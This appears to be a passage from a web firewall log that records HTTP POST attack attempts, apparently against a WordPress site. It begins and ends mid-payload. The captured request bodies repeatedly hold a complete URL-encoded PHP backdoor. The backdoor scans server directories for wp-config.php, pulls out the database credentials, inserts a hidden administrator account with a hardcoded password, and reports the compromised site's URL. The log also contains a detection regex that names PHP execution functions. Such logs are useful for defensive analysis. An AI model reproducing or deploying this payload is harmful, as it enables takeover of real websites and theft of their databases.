Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvGaNvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAfLKAmVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?1\nsec-ch-ua-platform:\"Android\"\nsec-fetch-user:?1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:12640\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-dest:document\n\nNp=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:04:50","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> cg:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20